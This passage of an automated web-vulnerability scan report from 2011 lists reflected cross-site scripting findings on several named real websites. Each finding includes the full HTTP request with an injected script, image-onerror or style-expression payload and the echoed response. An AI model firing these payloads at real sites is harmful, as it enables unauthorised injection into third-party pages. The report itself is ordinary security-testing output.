P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 12-May-2011 11:39:09 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 765

document.write('<img width="0" height="0" src="http://tag.admeld.com/match89c73';alert(1)//a585ca03c5d?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1305632369&custom_user_segments=%2C11265%2C17154%2C49027%2C59012%2C50056%2C50185%2C17163%2C50060%2C49026%2C500
...[SNIP]...

4.115. http://r.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Request

GET /v/feed/video/4674822.js?callback=videoPlayer.feed.parse_2284764g_dioediv12a45<script>alert(1)</script>f3c8e235d87&template=grab&cb=20115127 HTTP/1.1
Host: video.foxbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.3-1ubuntu6.5
Content-Length: 3952
Content-Type: application/javascript
Cache-Control: max-age=300
Date: Thu, 12 May 2011 11:38:37 GMT
Connection: close

videoPlayer.feed.parse_2284764g_dioediv12a45<script>alert(1)</script>f3c8e235d87({"@attributes":{"version":"2.0"},"channel":{"title":{},"link":{},"description":{},"language":"en-us","pubDate":"Thu, 12 May 2011 07:38:37 EDT","lastBuildDate":"Thu, 12 May 2011 07:38:37 EDT","generato
...[SNIP]...

4.118. http://wd.sharethis.com/api/getCount2.php [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wd.sharethis.com
Path:	/api/getCount2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload ea400<script>alert(1)</script>b2c22e0c34a was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/getCount2.php?cb=stButtons.processCBea400<script>alert(1)</script>b2c22e0c34a&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:36:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 401

stButtons.processCBea400<script>alert(1)</script>b2c22e0c34a({"url":"http:\/\/www.mimecast.com\/News-and-views\/Press-releases\/Dates\/2011\/5\/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director\/","total":0,"ourl":"http:\/\/www.mimec
...[SNIP]...

4.119. http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wd.sharethis.com
Path:	/api/getCount2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bfa1d<img%20src%3da%20onerror%3dalert(1)>865705b3363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bfa1d<img src=a onerror=alert(1)>865705b3363 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Directo/bfa1d<img%20src%3da%20onerror%3dalert(1)>865705b3363r%2F HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:36:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 273

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.mimecast.com\/News-and-views\/Press-releases\/Dates\/2011\/5\/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Directo\/bfa1d<img src=a onerror=alert(1)>865705b3363r\/"});

4.120. http://wd.sharethis.com/api/getCount2.php [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wd.sharethis.com
Path:	/api/getCount2.php

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 43cd7<img%20src%3da%20onerror%3dalert(1)>8a9a606e3bb was submitted in the url parameter. This input was echoed as 43cd7<img src=a onerror=alert(1)>8a9a606e3bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.mimecast.com%2FNews-and-views%2FPress-releases%2FDates%2F2011%2F5%2FMimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director%2F43cd7<img%20src%3da%20onerror%3dalert(1)>8a9a606e3bb HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mimecast.com/News-and-views/Press-releases/Dates/2011/5/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:36:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 271

stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.mimecast.com\/News-and-views\/Press-releases\/Dates\/2011\/5\/Mimecast-strengthens-channel-team-with-appointment-of-new-UK-Channel-Director\/43cd7<img src=a onerror=alert(1)>8a9a606e3bb"});

4.121. http://webezines.kwithost.com/sx25Feed.php [callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://webezines.kwithost.com
Path:	/sx25Feed.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload bfa61<script>alert(1)</script>31dea62f86d was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sx25Feed.php?keyword=Investment%20Firms&format=json&callback=jsonp1305198220594bfa61<script>alert(1)</script>31dea62f86d&_=1305198220619 HTTP/1.1
Host: webezines.kwithost.com
Proxy-Connection: keep-alive
Referer: http://investmentfirmsdirect.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:05:45 GMT
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Content-Length: 2044
Connection: close
Content-Type: text/html; charset=UTF-8

jsonp1305198220594bfa61<script>alert(1)</script>31dea62f86d([{"content_title":"Dodd-Frank Act: Hedge Funds and <b>Investment<\/b> Advisory <b>Firms<\/b>","content_main_content":"The Dodd-Frank Act pro
...[SNIP]...

4.122. http://wolfgreenfield.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wolfgreenfield.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139d0"><script>alert(1)</script>9e5f6c5a037 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico139d0"><script>alert(1)</script>9e5f6c5a037 HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:58 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://wolfgreenfield.com/favicon.ico139d0"><script>alert(1)</script>9e5f6c5a037');" title="Email Page">
...[SNIP]...

4.123. http://wolfgreenfield.com/v_arrow.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wolfgreenfield.com
Path:	/v_arrow.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 848c5"><script>alert(1)</script>79cf0510bfd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v_arrow.gif848c5"><script>alert(1)</script>79cf0510bfd HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:57 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://wolfgreenfield.com/v_arrow.gif848c5"><script>alert(1)</script>79cf0510bfd');" title="Email Page">
...[SNIP]...

4.124. http://wolfgreenfield.com/v_arrow.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wolfgreenfield.com
Path:	/v_arrow.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4fda"><script>alert(1)</script>49e11abb79a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v_arrow.gif?c4fda"><script>alert(1)</script>49e11abb79a=1 HTTP/1.1
Host: wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:01:56 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://wolfgreenfield.com/v_arrow.gif?c4fda"><script>alert(1)</script>49e11abb79a=1');" title="Email Page">
...[SNIP]...

4.125. http://www.bloomberg.com/apps/data [sgid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bloomberg.com
Path:	/apps/data

Issue detail

The value of the sgid request parameter is copied into the HTML document as plain text between tags. The payload c716b<script>alert(1)</script>0bd294ae9c6 was submitted in the sgid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /apps/data?pid=trackstoryhits&sgid=LKOO7G0UQVI901c716b<script>alert(1)</script>0bd294ae9c6 HTTP/1.1
Host: www.bloomberg.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hptest2011time=1303930127; OAX=rcHW8024ZQYADEK+; __utmz=30057196.1303930136.1.1.utmcsr=businessweek.com|utmccn=(referral)|utmcmd=referral|utmcct=/; s_vi=[CS]v1|26DC3287851D34A3-4000010C2016501C[CE]; profFbannerad=1; prodFbannerad=1; _chartbeat2=05vt53emlalrxzsu; opt=no-opt; __utmx=30057196.00013155880168891469:4:9; __utmxx=30057196.00013155880168891469:3825137:2592000; s_sess=%20s_ria%3Dflash%257CSilverlight%25204.0%3B%20s_cc%3Dtrue%3B%20ev1%3Dnews%253Asports%3B%20s_v20%3D2011-05-05%25252000%25253A00%25253A52%252520-0400%3B%20s_sq%3D%3B; DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; rsi_segs=K05539_10579|K05539_10529|K05539_10592; BT=10579&10529&10592; quint386uid=11486149183474481; oo_inv_percent=0; oo_inv_hit=1; __utma=30057196.790518761.1303930135.1303930135.1305200254.2; __utmc=30057196; __utmv=30057196.|2=201012_more_stories=9=1,3=opt=no-opt=1,; __utmb=30057196.5.7.1305200255961

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Cache-Control: max-age=900
Content-Type: text/plain
Content-Length: 71
Date: Thu, 12 May 2011 11:37:51 GMT
Connection: close

Error sgid=LKOO7G0UQVI901c716b<script>alert(1)</script>0bd294ae9c6

4.126. http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a893"style%3d"x%3aexpression(alert(1))"7e08a33da53 was submitted in the REST URL parameter 3. This input was echoed as 7a893"style="x:expression(alert(1))"7e08a33da53 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/80868dabe98107a18525708000086fe17a893"style%3d"x%3aexpression(alert(1))"7e08a33da53/$NavImagemap/0.52?OpenElement&FieldElemFormat=gif HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:22:01 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9368
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - 80868dabe98107a18525708000086fe17a893"style="x:expression(alert(1))"7e08a33da53/$NavImagemap/0.52">
...[SNIP]...

4.127. http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31990"%3b533bbbd2843 was submitted in the REST URL parameter 5. This input was echoed as 31990";533bbbd2843 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.5231990"%3b533bbbd2843?OpenElement&FieldElemFormat=gif HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:22:04 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9274
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...

...[SNIP]...

4.128. http://www.butlerrubin.com/web/br.nsf/index [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/index

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf370"style%3d"x%3aexpression(alert(1))"4fa2751b636 was submitted in the REST URL parameter 3. This input was echoed as bf370"style="x:expression(alert(1))"4fa2751b636 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/indexbf370"style%3d"x%3aexpression(alert(1))"4fa2751b636?openform HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:30 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9278
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - indexbf370"style="x:expression(alert(1))"4fa2751b636">
...[SNIP]...

4.129. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64fac"style%3d"x%3aexpression(alert(1))"7790debee61 was submitted in the REST URL parameter 3. This input was echoed as 64fac"style="x:expression(alert(1))"7790debee61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web64fac"style%3d"x%3aexpression(alert(1))"7790debee61/br.nsf/home_btn_01ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web64fac"style="x:expression(alert(1))"7790debee61/br.nsf/home_btn_01ov.jpg">
...[SNIP]...

4.130. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26672"style%3d"x%3aexpression(alert(1))"fe0666a8b66 was submitted in the REST URL parameter 4. This input was echoed as 26672"style="x:expression(alert(1))"fe0666a8b66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf26672"style%3d"x%3aexpression(alert(1))"fe0666a8b66/home_btn_01ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf26672"style="x:expression(alert(1))"fe0666a8b66/home_btn_01ov.jpg">
...[SNIP]...

4.131. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.butlerrubin.com
Path:	/web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f2da"style%3d"x%3aexpression(alert(1))"0fe406f8278 was submitted in the REST URL parameter 5. This input was echoed as 4f2da"style="x:expression(alert(1))"0fe406f8278 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_01ov.jpg4f2da"style%3d"x%3aexpression(alert(1))"0fe406f8278 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_01ov.jpg4f2da"style="x:expression(alert(1))"0fe406f8278">
...[SNIP]...

4.132. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
